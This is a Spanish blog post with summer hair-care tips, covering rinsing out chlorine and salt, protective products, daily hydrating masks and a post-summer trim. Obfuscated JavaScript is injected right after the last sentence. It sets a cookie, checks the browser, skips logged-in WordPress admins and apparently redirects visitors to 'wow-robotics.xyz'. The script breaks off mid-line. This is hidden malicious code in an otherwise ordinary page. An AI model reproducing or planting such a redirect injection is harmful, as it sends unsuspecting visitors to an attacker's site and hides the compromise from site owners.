No debemos olvidarnos, que nuestro cabello es una parte fundamental de nuestro cuerpo y que es importantísimo que esté sano y cuidado. Un cabello sano y bonito hace que nos sintamos más atractivos y con más seguridad, por ello os voy a dar uno consejos para cuidarlo.

Inevitablemente el verano es la época del año en la que más sufre nuestro pelo, para evitarlo toma nota:

· Debemos aclarar bien el pelo cuando lo lavemos, porque hay que eliminar del todo las sustancias que hacen que el pelo se estropee, como el exceso de sol, el cloro de las piscinas y la sal del mar.

· Hay que utilizar productos protectores capilares. Son muy parecidos a las cremas de protección solar, pero contienen ingredientes específicos para cabellos que previenen la deshidratación.

· Utilizar más que nunca mascarillas muy hidratantes para pr4evenir la deshidratación. Los cabellos largos, son los que más sufren durante el verano, por lo que lo ideal es que utilicen una mascarilla a diario.

· Para eliminar todo el cabello dañando y que el pelo coja fuerza y crezca mejor, recomiendo un corte de pelo después del verano, así acabarás con los resto de exceso de sol, cloro y sal del mar.

Ponte manos a la obra y no permitas que el verano acabe con esa precios melena que tanto te ha costado conseguir. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone